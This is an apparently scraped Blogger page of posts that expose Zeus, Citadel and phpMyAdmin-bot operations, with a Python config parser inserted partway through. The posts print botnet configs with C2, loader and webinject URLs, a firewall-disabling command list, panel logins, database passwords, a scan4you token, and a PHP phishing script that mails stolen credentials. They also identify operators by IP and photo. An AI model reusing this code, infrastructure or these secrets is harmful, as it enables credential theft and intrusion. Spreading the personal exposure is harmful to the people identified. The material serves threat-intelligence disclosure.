<span style="font-family: Verdana, sans-serif; font-size: small;">I will attach an archive with all his data later</span><br />
<span style="font-family: Verdana, sans-serif; font-size: small;">see, all *.txt files are vulnerable phpMyAdmin panels that can maybe be exploited</span><br />
<br />
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqxGcARZS5GxyYeFl3iOooX7x8gR5ZWzFZmukrSMBdaS_cF-3dfdVT8pEat6hno2kwwacXX5M5isqq-RREtzq8UELU5h31SyrEbJcN9RDAcqH_opZxLf-APie0b3s_MmU_7OJ-wgm8WPo/s1600/x4.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqxGcARZS5GxyYeFl3iOooX7x8gR5ZWzFZmukrSMBdaS_cF-3dfdVT8pEat6hno2kwwacXX5M5isqq-RREtzq8UELU5h31SyrEbJcN9RDAcqH_opZxLf-APie0b3s_MmU_7OJ-wgm8WPo/s320/x4.png" /></a></span><br />
<pre style="background: none repeat scroll 0% 0% rgb(240, 240, 240); border: 1px dashed rgb(204, 204, 204); color: black; font-family: arial; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><span style="font-size: small;"><code style="color: black; word-wrap: normal;">cat all.pl
http://pastebin.com/JZnMHGGE
// I paste just this part here
my $url = $host;
my $ftp = "ftp://185.4.29.127/a/0.php";
my $len = length($ftp);
// every exploited PC is forced to download this file over FTP
cat 0.php
http://pastebin.com/g75MAgjz
// it's a PHP bot
"server" => "222.216.30.28",
"port" => "3131",
"key" => "*",
"prefix" => "",
"maxrand" => "8",
"chan" => "#dd0s#",
"trigger" => ".",
"hostauth" => "root.edu"
// there are some other files
cat a.php
http://pastebin.com/CKs5fRkv
cat ax.php
http://pastebin.com/GC3dcuyz
cat win.php
http://pastebin.com/3Np2JsYw
</code></span></pre>
<span style="font-family: Verdana, sans-serif; font-size: small;">-All data will be attached soon as an archive .. <br />More about the pma bot <a href="http://blog.malwaremustdie.org/2013/10/a-disclosure-of-whats-behind-w00tw00t.html" target="_blank">Here</a></span>bi0http://www.blogger.com/profile/14620421761593085083noreply@blogger.com0tag:blogger.com,1999:blog-2580748854525661454.post-40387018339348725132015-01-04T14:23:00.002-08:002015-01-04T14:23:44.645-08:00Citadel - cynthialemos1225.ddns.net ( Richy Adams ) - Exposed <div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWyo0EiL8_ZMyk2muc9rko0Tb65uaExTG76QkystLF3NaoqeDsen5ZpBQ4hrQ3jjSoULE3GnEyE1NP6A_ZXVHsGyCTZNvJRWr6Ra8dPo69CgKhla-qrhXZY4xnKkycHTbs_bCiW637Ejs/s1600/1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWyo0EiL8_ZMyk2muc9rko0Tb65uaExTG76QkystLF3NaoqeDsen5ZpBQ4hrQ3jjSoULE3GnEyE1NP6A_ZXVHsGyCTZNvJRWr6Ra8dPo69CgKhla-qrhXZY4xnKkycHTbs_bCiW637Ejs/s1600/1.png" height="234" width="320" /></a></div>
<br />
<br />
<pre style="background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">// config.php
$config = array (
'mysql_host' => 'localhost',
'mysql_user' => 'root',
'mysql_pass' => 'qwerty23456@',
'mysql_db' => 'tenna',
'reports_path' => '_reports1190699691',
'reports_to_db' => 1,
'reports_to_fs' => 0,
'reports_geoip' => 0,
'jabber' =>
array (
'host' => '',
'login' => '',
'pass' => '',
'port' => 5222,
),
'reports_jn' => 0,
'reports_jn_logfile' => '_reports1190699691/jabber.log',
......
),
'allowed_countries_enabled' => 0,
'allowed_countries' => '',
'botnet_timeout' => 1500,
'botnet_cryptkey' => 'sgasgdsgdshwgrekhgjlksdng',
);
$config['botnet_cryptkey_bin'] = array(200, 56, 101, 2, 42, 30, 79, 114, 114, 231, 90, 185, 178, 234, 43, 113, 77, 215, 74, 251, 72, 147, 112, 209, 143, 3, 221, 34, 213, 155, 59, 1, 102, 95, 251, 64, 4, 6, 37, 10, 88, 115, 111, 203, 37, 251, 237, 91, 59, 186, 76, 153, 210, 127, 255, 187, 176, 187, 202, 17, 228, 83, 73, 72, 124, 73, 129, 105, 86, 226, 91, 206, 125, 149, 142, 159, 128, 61, 189, 143, 202, 109, 63, 124, 118, 48, 176, 36, 177, 181, 123, 0, 242, 220, 30, 100, 232, 246, 146, 150, 224, 233, 252, 198, 250, 44, 26, 146, 38, 153, 1, 249, 208, 171, 247, 133, 20, 117, 173, 227, 152, 170, 248, 62, 39, 119, 169, 200, 110, 65, 11, 164, 164, 19, 183, 7, 133, 13, 238, 205, 87, 28, 86, 60, 67, 222, 16, 128, 64, 138, 200, 81, 75, 12, 62, 240, 23, 168, 201, 190, 47, 180, 95, 214, 218, 206, 128, 162, 169, 78, 44, 174, 116, 45, 161, 245, 27, 142, 18, 86, 92, 195, 155, 78, 248, 150, 58, 54, 14, 174, 88, 211, 197, 35, 19, 142, 10, 99, 5, 33, 137, 161, 65, 175, 51, 91, 107, 201, 193, 40, 150, 218, 105, 129, 115, 168, 41, 57, 244, 108, 29, 130, 231, 141, 236, 214, 182, 177, 9, 21, 229, 57, 90, 100, 140, 106, 93, 217, 213, 158, 221, 17, 38, 98, 165, 123, 199, 76, 223, 239, 154, 110, 16, 229, 190, 4);
return $config;
</code>
</pre>
<br />
<pre style="background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">config.txt / from builder
entry "StaticConfig"
botnet "CIT"
timer_config 4 9
timer_logs 3 6
timer_stats 4 8
timer_modules 1 4
timer_autoupdate 8
url_config1 "http://richyadams.zapto.org/xampp/link/config.bin"
remove_certs 1
; disable_tcpserver 0
disable_cookies 0
encryption_key "jzhbfgjdhbgjhddkjgskdj"
report_software 1
enable_luhn10_get 0
enable_luhn10_post 1
disable_antivirus 0
use_module_video 1
antiemulation_enable 0
disable_httpgrabber 0
use_module_ffcookie 1
end
entry "DynamicConfig"
url_loader "http://richyadams.zapto.org/xampp/link/soft.exe"
url_server "http://richyadams.zapto.org/xampp/link/gate.php"
file_webinjects "injects.txt"
url_webinjects "http://richyadams.zapto.org/xampp/link/file.php"
entry "AdvancedConfigs"
"http://richyadams.zapto.org/xampp/link/config.bin"
"http://richyadams.zapto.org/xampp/link/config.bin"
end
entry "WebFilters"
"#*wellsfargo.com/*"
"@*payment.com/*"
"!http://*.com/*.jpg"
end
entry HttpVipUrls
"*facebook.com/*"
end
entry "WebDataFilters"
end
entry "WebFakes"
end
entry "CmdList"
"hostname"
"tasklist"
"ipconfig /all"
"netsh firewall set opmode disable"
end
entry "Keylogger"
processes "bank.exe;java.exe"
time 3
end
entry "Video"
quality 1
length 600
end
end
</code></pre>
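The builder config.txt above uses a simple block format: one key with its arguments per line, double-quoted strings, ';' comments, and nested entry "Name" ... end blocks (the entry name is sometimes unquoted, as with HttpVipUrls). As an added example that is not part of the original post, the following Python parser reads that format and pulls out the C2 URLs (url_* settings plus the AdvancedConfigs list) while ignoring WebFilters patterns; the sample text is constructed with a placeholder host in place of the post's domain.

```python
import re
from typing import Dict, List

# Constructed sample mirroring the post's config.txt, with a placeholder host.
SAMPLE_CONFIG = r'''
entry "StaticConfig"
  timer_config 4 9
  url_config1 "http://c2.example.invalid/link/config.bin"
  ; disable_tcpserver 0
end
entry "DynamicConfig"
  url_loader "http://c2.example.invalid/link/soft.exe"
  url_server "http://c2.example.invalid/link/gate.php"
  url_webinjects "http://c2.example.invalid/link/file.php"
  entry "AdvancedConfigs"
    "http://c2.example.invalid/link/config.bin"
  end
  entry "WebFilters"
    "#*wellsfargo.com/*"
    "!http://*.com/*.jpg"
  end
  entry HttpVipUrls
    "*facebook.com/*"
  end
  entry "Keylogger"
    processes "bank.exe;java.exe"
  end
end
'''

# A token is either a double-quoted string or a run of non-whitespace.
_TOKEN_RE = re.compile(r'"([^"]*)"|(\S+)')


def tokenize(line: str) -> List[str]:
    """Quoted strings keep spaces and embedded ';'; an unquoted ';' starts a comment."""
    tokens: List[str] = []
    for m in _TOKEN_RE.finditer(line):
        if m.group(1) is not None:
            tokens.append(m.group(1))
        elif m.group(2).startswith(";"):
            break
        else:
            tokens.append(m.group(2))
    return tokens


def _entry(name: str) -> Dict:
    return {"name": name, "settings": {}, "items": [], "children": {}}


def parse_config(text: str) -> Dict:
    """Build nested entries; raises ValueError when entry/end are unbalanced."""
    root = _entry("<root>")
    stack = [root]
    for lineno, raw in enumerate(text.splitlines(), 1):
        tokens = tokenize(raw)
        if not tokens:
            continue
        head = tokens[0]
        if head == "entry":
            if len(tokens) != 2:
                raise ValueError(f"line {lineno}: malformed entry header")
            child = _entry(tokens[1])          # name may be quoted or bare
            stack[-1]["children"][tokens[1]] = child
            stack.append(child)
        elif head == "end":
            if len(stack) == 1:
                raise ValueError(f"line {lineno}: 'end' without an open entry")
            stack.pop()
        elif len(tokens) == 1:
            stack[-1]["items"].append(head)    # bare list item: URL, filter, command
        else:
            stack[-1]["settings"][head] = tokens[1:]
    if len(stack) != 1:
        raise ValueError(f"unterminated entry {stack[-1]['name']!r}")
    return root


def c2_urls(root: Dict) -> List[str]:
    """url_* settings plus the AdvancedConfigs list, deduplicated in order.
    WebFilters patterns like "!http://*.com/*.jpg" are not C2 and are skipped."""
    urls: List[str] = []

    def walk(entry: Dict) -> None:
        for key, args in entry["settings"].items():
            if key.startswith("url_"):
                urls.extend(args)
        if entry["name"] == "AdvancedConfigs":
            urls.extend(entry["items"])
        for child in entry["children"].values():
            walk(child)

    walk(root)
    return list(dict.fromkeys(urls))


if __name__ == "__main__":
    for url in c2_urls(parse_config(SAMPLE_CONFIG)):
        print("C2 URL:", url)
```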
<br />
<span style="font-family: "Courier New",Courier,monospace;"><span style="font-size: small;">Not many bots Richy ..</span></span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjA6IU7d9cBTkWkdLvHfIyhTvlKE4ot9f1g6NYHFsm8Kvow52OltZgZJhWd1b48HQ9s-u3zniiOQrXvO9ApVhifv7x0ONQ5x-b6iiZeFhJNKsdOuXJRFc8TUCE-6VfqPSqjE2zPEOAPkSM/s1600/2.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjA6IU7d9cBTkWkdLvHfIyhTvlKE4ot9f1g6NYHFsm8Kvow52OltZgZJhWd1b48HQ9s-u3zniiOQrXvO9ApVhifv7x0ONQ5x-b6iiZeFhJNKsdOuXJRFc8TUCE-6VfqPSqjE2zPEOAPkSM/s1600/2.png" height="234" width="320" /></a></div>
<pre style="background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">// Here is the admin IP address !
41.138.188.121 - - [02/Jan/2015:21:46:00 +0100] "GET /xampp/link/cp.php?m=home HTTP/1.1" 200 224893 "http://cynthialemos1225.ddns.net/xampp/link/cp.php?m=home" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
</code></pre>
<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUDDmXrP893HF4ufP9l5-7vSr_kQnN7BPMhGkHh1NBa2SkDxHJizyIIdUMpO_yJsdSDL9fIQ036sT_Cd5Dhx9elRDKIT9v5XdZYavB2W-JvQ-_3sKbVlS6oYHbttliJmyUMFA00F3-LPc/s1600/3.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUDDmXrP893HF4ufP9l5-7vSr_kQnN7BPMhGkHh1NBa2SkDxHJizyIIdUMpO_yJsdSDL9fIQ036sT_Cd5Dhx9elRDKIT9v5XdZYavB2W-JvQ-_3sKbVlS6oYHbttliJmyUMFA00F3-LPc/s1600/3.png" height="173" width="320" /></a><br />
<br />
His location based on the IP <br />
and here is a pic of him<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj27q14gavU9ZUwn3jY9tlWaTVKQ6aVyqHxjr8dSFJGn_iZZNYZgrW0ZhewAUlijeiyu4JxX1eGLh7VBziUivhgpY-Hff4HmiqMn7J79wQ9H4diT5DjNtx7CS7UnLo_n4yGDYEfnCxovcM/s1600/4.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj27q14gavU9ZUwn3jY9tlWaTVKQ6aVyqHxjr8dSFJGn_iZZNYZgrW0ZhewAUlijeiyu4JxX1eGLh7VBziUivhgpY-Hff4HmiqMn7J79wQ9H4diT5DjNtx7CS7UnLo_n4yGDYEfnCxovcM/s320/4.png" /></a><br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjS3MmPFT7E36hU-_ZyhEpV61YNUs6QsYyY7_9uDMgx8YgjLfJHRyjiggldwD34WJQljB24uOUuZAu3s3TXQbF42LvaU2zB65zpwN1V1TyqsndQHNh2jRjHRYJTvpKohkycu__ucb8iuAY/s1600/5.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjS3MmPFT7E36hU-_ZyhEpV61YNUs6QsYyY7_9uDMgx8YgjLfJHRyjiggldwD34WJQljB24uOUuZAu3s3TXQbF42LvaU2zB65zpwN1V1TyqsndQHNh2jRjHRYJTvpKohkycu__ucb8iuAY/s320/5.png" /></a><br />
luv ur pix too !!bi0http://www.blogger.com/profile/14620421761593085083noreply@blogger.com0tag:blogger.com,1999:blog-2580748854525661454.post-54227836638079530072014-12-06T12:09:00.001-08:002014-12-06T12:09:36.348-08:00Zeus Botnet - 54.201.153.149 - Owned<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKO18LnuerehkEN_0O1PK9mWHfjcgJvzfKuo62mEQClz66f4GQIKdYl3mFiwh5z46vjZZ5iEMKvZbKxJ7_8fbqTzy6qWOz2NJ2Y6XIRxK4TTyjYDbS66QRYdyfw4jLGKZeG6rqiGM046U/s1600/2.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKO18LnuerehkEN_0O1PK9mWHfjcgJvzfKuo62mEQClz66f4GQIKdYl3mFiwh5z46vjZZ5iEMKvZbKxJ7_8fbqTzy6qWOz2NJ2Y6XIRxK4TTyjYDbS66QRYdyfw4jLGKZeG6rqiGM046U/s320/2.png" /></a><br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxShqYOWuQaXU0k0u3UmE0fchbzLaQntm6QC68x9QrD_HSjZADAEmC5RKJ-QEItoGaHaWccqSBiNqSKsuCGue4j2SxvgHlBLJIDOBZ3b1mmnEgJ3BxeD2ZyNegFAULmAtpnWfY6HhhFK4/s1600/1.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxShqYOWuQaXU0k0u3UmE0fchbzLaQntm6QC68x9QrD_HSjZADAEmC5RKJ-QEItoGaHaWccqSBiNqSKsuCGue4j2SxvgHlBLJIDOBZ3b1mmnEgJ3BxeD2ZyNegFAULmAtpnWfY6HhhFK4/s320/1.png" /></a><br />
<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLgRnkVMiRBZ0lo3wmMjyW1wNUR8OGrJ8gZlZRmDYL4JQc9s1m74-mJACYSbuoylgxs7FDc3Zky_vLjAZ4ZhOwzVLZyoqf6ALo5ZNMuWIVl3bdwOHm0GuMAf_6WpRvp48DEp0OKAJFMtQ/s1600/3.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLgRnkVMiRBZ0lo3wmMjyW1wNUR8OGrJ8gZlZRmDYL4JQc9s1m74-mJACYSbuoylgxs7FDc3Zky_vLjAZ4ZhOwzVLZyoqf6ALo5ZNMuWIVl3bdwOHm0GuMAf_6WpRvp48DEp0OKAJFMtQ/s320/3.png" /></a><br />
<br />
<pre style="background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">
// version 2.0.8.9
// admin user
admin : mentman1
// ftp :
deamon:xampp
// config
#?php
$config['mysql_host'] = '127.0.0.1';
$config['mysql_user'] = 'daemon';
$config['mysql_pass'] = 'jG9mBvGQM7Jhbv62';
$config['mysql_db'] = 'evildb';
$config['reports_path'] = '_feedback';
$config['reports_to_db'] = 1;
$config['reports_to_fs'] = 1;
$config['reports_no_shit'] = 1;
$config['reports_jn'] = 0;
$config['reports_jn_logfile'] = '';
$config['reports_jn_account'] = '';
$config['reports_jn_pass'] = '';
$config['reports_jn_server'] = '';
$config['reports_jn_port'] = 5222;
$config['reports_jn_to'] = '';
$config['reports_jn_list'] = '';
$config['reports_jn_script'] = '';
$config['reports_dyncfg'] = 0;
$config['reports_dyncfg_script'] = '';
$config['membership_timeout'] = 1500;
$config['membership_cryptkey'] = 'ovWPvhfFJ';
$config['membership_cryptkey_bin'] = array(111, 27, 63, 146, 46, 219, 229, 29, 132, 252, 195, 222, 120, 85, 235, 8, 237, 173, 210, 215, 196, 14, 183, 54, 105, 33, 119, 230, 86, 101, 117, 93, 3, 131, 112, 197, 36, 147, 74, 89, 212, 64, 21, 207, 15, 60, 224, 30, 1, 141, 250, 32, 94, 194, 90, 72, 77, 214, 134, 165, 0, 126, 199, 115, 255, 193, 245, 52, 118, 99, 48, 49, 187, 104, 159, 163, 244, 148, 190, 221, 26, 247, 191, 88, 103, 62, 133, 70, 108, 208, 216, 82, 114, 124, 243, 186, 71, 100, 211, 169, 246, 138, 10, 57, 16, 180, 200, 125, 202, 150, 236, 130, 129, 149, 189, 22, 168, 201, 80, 184, 67, 233, 106, 172, 84, 177, 158, 28, 151, 209, 182, 161, 154, 171, 102, 227, 248, 40, 92, 58, 152, 95, 142, 68, 156, 97, 17, 20, 254, 251, 13, 107, 223, 56, 160, 50, 228, 51, 79, 66, 9, 91, 75, 232, 239, 2, 83, 144, 45, 35, 166, 37, 181, 240, 6, 65, 185, 253, 5, 18, 25, 145, 188, 137, 192, 127, 128, 98, 19, 155, 34, 38, 178, 213, 136, 31, 198, 140, 205, 123, 206, 231, 226, 55, 238, 87, 203, 24, 109, 122, 69, 110, 157, 59, 242, 42, 81, 135, 218, 121, 170, 41, 76, 179, 12, 139, 96, 204, 241, 11, 164, 53, 249, 44, 23, 43, 78, 113, 217, 220, 234, 116, 4, 7, 73, 176, 175, 174, 225, 143, 47, 39, 167, 153, 162, 61);
?>
// extracted by Xylitol
RC4 Keystream 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
hxxp://54.201.153.149/ontrack-list/controller/theboldandthebeaded.php
hxxp://54.201.153.149/ontrack-list/controller/hamilton.bin
</code></pre>
Posted by bi0<br />
2014-11-08: Zeus - berizka.gorodok.km.ua - Botnet<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinvDRWZ6iWlJqfP4d1VVsLnUVWvUIl-RzU1XLJUFh75SA-qlOw980Q5-q0-lpAX4FFX9kacZpC9YfxLIn79gzL44oF7IKQICGsj7AmPYlCnzZO4gtGX7e-QtD9heGULzYixblMSnD8gb0/s1600/1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinvDRWZ6iWlJqfP4d1VVsLnUVWvUIl-RzU1XLJUFh75SA-qlOw980Q5-q0-lpAX4FFX9kacZpC9YfxLIn79gzL44oF7IKQICGsj7AmPYlCnzZO4gtGX7e-QtD9heGULzYixblMSnD8gb0/s1600/1.png" height="232" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTBgA5hGrqfNlILuHQ_5OkB8lABUVeGApNjoeg2Bg7SnRr3qHvX2w0SSvu0e1W-8YEFT2E5SAzlb7747YOlrtZtRY3puLnzQgHScgvwq7NkZcYCpMkrrWbgf6DSv8T6KLPggGaH5DdjVg/s1600/2.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTBgA5hGrqfNlILuHQ_5OkB8lABUVeGApNjoeg2Bg7SnRr3qHvX2w0SSvu0e1W-8YEFT2E5SAzlb7747YOlrtZtRY3puLnzQgHScgvwq7NkZcYCpMkrrWbgf6DSv8T6KLPggGaH5DdjVg/s1600/2.png" height="232" width="320" /></a></div>
<br />
<pre style="background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">// mysql config from bot
$config['mysql_host'] = '127.0.0.1';
$config['mysql_user'] = 'berizka_image';
$config['mysql_pass'] = 'olaoluwa!@#';
$config['mysql_db'] = 'berizka_image';
// zeus panel
hxxp://berizka.gorodok.km.ua/core/auth/image/cp.php
admin:dragob
</code></pre>
Posted by bi0<br />
2014-11-06: Zeus Citadel - 65.200.132.20 - Botnet<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCoUUduW4qxEpXQyZpXUPPKiZwPP8cZfrAGHP02TKIjSq2SeUj_aM1EfLTg4FpqDYgXwlE19Ai6u8XtVT5qUtVCCAsxPm1rtd-ro6qtttlfq0D_f6GNvS_1O1A2Di5ME6aBdi-YKqQOC4/s1600/1.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCoUUduW4qxEpXQyZpXUPPKiZwPP8cZfrAGHP02TKIjSq2SeUj_aM1EfLTg4FpqDYgXwlE19Ai6u8XtVT5qUtVCCAsxPm1rtd-ro6qtttlfq0D_f6GNvS_1O1A2Di5ME6aBdi-YKqQOC4/s320/1.png" /></a><br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjasLminA1I5SC6zaIFGOLUFsMkvNotJxmjLl0broYkBaSN4pyTY9fzh4Ke6MoWnAw6ruI4StLFv3XCs-eJXicgMYxvGis6UtmHEeJ2l_oDG0rKoNeYgOqZiD4Nsahli39vlGpRGHJAhlg/s1600/2.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjasLminA1I5SC6zaIFGOLUFsMkvNotJxmjLl0broYkBaSN4pyTY9fzh4Ke6MoWnAw6ruI4StLFv3XCs-eJXicgMYxvGis6UtmHEeJ2l_oDG0rKoNeYgOqZiD4Nsahli39vlGpRGHJAhlg/s320/2.png" /></a><br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3TnQhFojRJPuadNH-TuKn1r1hpebla5oiAOrCkOKbdgPoYN18yEhyGYF54N_Ra2uhtVg03tL7B-vY-HE8_0AowR7ORPASN6I615LYlWxW-r37o59GZOXd1xmDxqZTh6vLkkCEBweFffY/s1600/4.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3TnQhFojRJPuadNH-TuKn1r1hpebla5oiAOrCkOKbdgPoYN18yEhyGYF54N_Ra2uhtVg03tL7B-vY-HE8_0AowR7ORPASN6I615LYlWxW-r37o59GZOXd1xmDxqZTh6vLkkCEBweFffY/s320/4.png" /></a><br />
<br />
<span style="font-family: 'Courier New',Courier,monospace;">The admin </span>....<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLf6Nigt9NWXLY_1w7kqb7AQ6djiCD17lClV8uE7Qx4ts5RUTeCySVCA8DsjZjI0s-TSCgbWIImjj3GGkT6b3oxBTedNZTGHQ-SYLqBfO-UDmZxh9blmAutJ8Gsk0CJ5TCbpEGOWNHk3k/s1600/8.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLf6Nigt9NWXLY_1w7kqb7AQ6djiCD17lClV8uE7Qx4ts5RUTeCySVCA8DsjZjI0s-TSCgbWIImjj3GGkT6b3oxBTedNZTGHQ-SYLqBfO-UDmZxh9blmAutJ8Gsk0CJ5TCbpEGOWNHk3k/s320/8.png" /></a><br />
<br />
<pre style="background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">// panel
http://65.200.132.20/webalizer/webdav/cp.php
admin:govno
// email used for phishing
kotak4amal@gmail.com
// scan4you account and jabber
'scan4you_jid' => 'uznik15@jabber.ru',
'scan4you_id' => '29719',
'scan4you_token' => 'd47310b2beea51ec546e',
// m.php
<?include 'images/validate_form.js';
$ip = getenv("REMOTE_ADDR");
$message .= "-------- XxX *~* Mr-Lordz *~* XxX-------\n";
$message .= "User-ID: ".$_POST['user']."\n";
$message .= "Password: ".$_POST['passwd']."\n";
$message .= "IP: ".$ip."\n";
$message .= "-------------Created By Mr-lordz--------------\n";
$recipient = "kotak4amal@gmail.com";
$subject = "ComCastID ~ $ip";
$headers = "From: ";
$headers .= $_POST['eMailAdd']."\n";
$headers .= "MIME-Version: 1.0\n";
mail($recipient,$subject,$message,$headers);
if (mail($recipent,$subject,$message,$headers))
{
header("Location: billing.htm");
}
else
{
echo "ERROR! Please go back and try again.";
}
?> </code></pre>
Posted by bi0<br />
2014-11-06: Zeus - sip1distribution.com - Botnet<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiai17wBJ4zEU_X4CE-xeecEIWK9lYACkloCwH0aISXUlMTYXg_3Yr-dJpiF57A2hSQBgVtfxr6HHR7EhmR4qgrlfJtu7EFimmcZ1wNMZAuANt__1w25sh7O7xNwGYHsBu6gKIP3Xa5rrc/s1600/0.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiai17wBJ4zEU_X4CE-xeecEIWK9lYACkloCwH0aISXUlMTYXg_3Yr-dJpiF57A2hSQBgVtfxr6HHR7EhmR4qgrlfJtu7EFimmcZ1wNMZAuANt__1w25sh7O7xNwGYHsBu6gKIP3Xa5rrc/s320/0.png" /></a><br />
<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZWcbwoPnsrD1BYXsRCQr5DiEpaaBuLsctxoWQubSIGK78DfixGaxlumKNtItcruWz2mCkM2x0Tw9lrlCTTqvg0UGIqpy3SXmhj3-2Hu-ggG18LxrSnw4qgp3ncanxJj5zD2P3i-94ldQ/s1600/1.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZWcbwoPnsrD1BYXsRCQr5DiEpaaBuLsctxoWQubSIGK78DfixGaxlumKNtItcruWz2mCkM2x0Tw9lrlCTTqvg0UGIqpy3SXmhj3-2Hu-ggG18LxrSnw4qgp3ncanxJj5zD2P3i-94ldQ/s320/1.png" /></a><br />
<br />
<span style="font-family: 'Courier New',Courier,monospace;"><span style="font-size: small;">Some photos of the admin ..</span></span><br />
<br />
<a href="http://img017.wlog.com/usrimg/usrimg017/6/14/_8813058_12281406_1382686442.jpg" imageanchor="1"><img border="0" src="http://img017.wlog.com/usrimg/usrimg017/6/14/_8813058_12281406_1382686442.jpg" height="320" width="240" /></a><br />
<br />
<a href="http://ce484cb8e792306e275c-79e83dd3f64264481d2bc6deba896802.r30.cf2.rackcdn.com/6374598_0_4a280092369f2497f0991396c298d4a5.jpg" imageanchor="1"><img border="0" src="http://ce484cb8e792306e275c-79e83dd3f64264481d2bc6deba896802.r30.cf2.rackcdn.com/6374598_0_4a280092369f2497f0991396c298d4a5.jpg" height="320" width="320" /></a>
<br />
<br />
<br />
<pre style="background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">// admin ip
hxxp://www.utrace.de/?query=<span style="background-color: yellow;">41.79.219.204</span>
// zeus panel
admin:thankgod123
hxxp://sip1distribution.com/.zerd/cp.php
// mysql
$config['mysql_host'] = '127.0.0.1';
$config['mysql_user'] = 'sip1dist_admin';
$config['mysql_pass'] = 'thankgod123';
$config['mysql_db'] = 'sip1dist_admin';
</code></pre>
Posted by bi0<br />
2014-11-05: Zbot - kihsmalta.com - Hacked<br />
<br />
